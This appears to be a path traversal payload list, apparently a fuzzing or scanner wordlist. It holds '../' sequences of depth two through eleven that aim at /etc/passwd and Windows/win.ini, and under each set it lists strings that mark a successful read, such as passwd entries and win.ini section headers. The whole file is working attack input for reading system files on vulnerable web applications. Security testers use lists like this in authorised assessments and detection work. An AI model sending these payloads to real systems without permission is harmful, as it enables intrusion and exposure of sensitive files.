# Payloads
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd

# Indicators
root:x:0:0:
bin:x:1:1:
daemon:x:2:2:

# Payloads
../../Windows/win.ini
../../../Windows/win.ini
../../../../Windows/win.ini
../../../../../Windows/win.ini
../../../../../../Windows/win.ini
../../../../../../../Windows/win.ini
../../../../../../../../Windows/win.ini
../../../../../../../../../Windows/win.ini
../../../../../../../../../../Windows/win.ini
../../../../../../../../../../../Windows/win.ini

# Indicators
; for 16-bit app support
[extensions]
[files]
[Mail]